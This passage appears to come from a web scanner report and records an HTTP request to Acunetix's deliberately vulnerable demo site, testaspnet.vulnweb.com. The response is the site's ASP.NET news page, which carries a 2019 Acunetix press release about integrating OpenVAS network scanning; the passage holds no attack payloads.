value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKP1p3RBAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNw4dcQo8tH//aNq1Q9scKgXRi5G" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=0&NewsAd=ads/def.html
Method	GET
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 484 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0&NewsAd=ads/def.html HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:42:03 GMT Content-Length: 22904
Response Body - size: 22,904 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=0&NewsAd=ads%2fdef.html" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgb